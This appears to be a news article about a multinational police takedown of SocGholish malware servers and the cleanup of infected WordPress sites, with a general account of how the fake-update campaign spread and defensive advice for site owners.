Operation Endgame Disrupts SocGholish Servers, Cleans 14,971 WordPress Sites

Dutch law enforcement authorities, operating alongside counterparts from Canada, Germany, and the United States, have executed a major takedown against SocGholish — one of the most prolific initial access broker networks in the cybercrime ecosystem. The operation, conducted under the banner of Operation Endgame, resulted in the disruption of command-and-control servers and the remediation of nearly 15,000 infected WordPress websites.

What Is SocGholish?

SocGholish (also tracked as FakeUpdates) is a JavaScript-based malware framework that has been active since at least 2017. The campaign operates by injecting malicious JavaScript into legitimate websites — primarily WordPress installations — that presents visitors with fake browser or software update prompts.

When a victim clicks the fake update notification, they download a ZIP archive containing a malicious JavaScript file that, upon execution, establishes an initial foothold on the victim's machine. SocGholish then serves as an initial access broker, selling or transferring that access to secondary threat actors including ransomware operators, espionage groups, and data theft crews.

The network is closely associated with the Evil Corp cybercrime group, which has been sanctioned by US authorities.

Scale of Operation Endgame

The operation yielded significant results across multiple fronts:

• 14,971 WordPress websites cleaned of SocGholish injection scripts
• Multiple command-and-control servers seized or taken offline
• Infrastructure used to redirect victims to malware delivery pages disrupted
• Coordination with web hosting providers to prevent reinfection of cleaned sites

Dutch authorities stated: "With these actions we deprive cybercriminals of access to infected computers and the networks they use to expand their operations."

How WordPress Sites Were Compromised

SocGholish's infection of WordPress sites typically followed a consistent pattern:

1. Vulnerability exploitation — attackers scanned for and exploited known WordPress plugin and theme vulnerabilities, particularly in popular plugins with unpatched security flaws
2. Credential stuffing — compromised admin credentials from previous breaches were used to authenticate directly to wp-admin
3. Malicious script injection — once admin access was obtained, attackers modified legitimate JavaScript files or injected new script tags that loaded the SocGholish payload from attacker-controlled domains
4. Traffic redirection — injected scripts used fingerprinting logic to only display fake update prompts to specific victim profiles, avoiding detection by site owners and security crawlers

The selective display of malicious content — targeting only certain browser types, geographies, or user behaviors — made automated detection of SocGholish infections significantly more challenging.

Significance for the Cybercrime Ecosystem

SocGholish represents a critical node in the cybercrime supply chain. As an initial access broker network, it has been linked to:

• Pre-ransomware intrusions by multiple ransomware groups
• WastedLocker and other Evil Corp ransomware variants
• Data exfiltration operations targeting financial and healthcare organizations
• Lateral movement into enterprise networks via compromised employee endpoints

By dismantling the infrastructure that fed these downstream attacks, Operation Endgame effectively cuts off a supply line used by multiple threat actors simultaneously — a force multiplier effect in law enforcement terms.

International Coordination

Operation Endgame has been an ongoing multi-phase effort that began with earlier disruptions of botnets and infrastructure in 2024 and 2025. The SocGholish phase represents a continuation of that coordinated strategy, demonstrating that international law enforcement operations against cybercrime infrastructure have become more systematic and sustained.

Participating agencies included:

• Netherlands National Police (lead)
• Royal Canadian Mounted Police (RCMP)
• German Federal Criminal Police Office (BKA)
• US Federal Bureau of Investigation (FBI)
• US Cybersecurity and Infrastructure Security Agency (CISA)

Recommendations for WordPress Site Owners

WordPress site administrators should take the following steps regardless of whether they believe their site was affected:

1. Audit installed plugins and themes — remove unused plugins and update all active ones to current versions
2. Review file integrity — use tools like WP Integrity Checker or Sucuri SiteCheck to identify modified JavaScript files
3. Audit admin accounts — review and remove any unauthorized administrator accounts
4. Enable two-factor authentication on all admin accounts
5. Check outbound network requests in server logs for connections to unfamiliar domains
6. Deploy a Web Application Firewall (WAF) to block known SocGholish injection patterns
7. Monitor for content changes using file change detection tools

Site owners who suspect their WordPress installation may have been part of the SocGholish network should contact their hosting provider and review guidance from CISA and the Dutch National Police.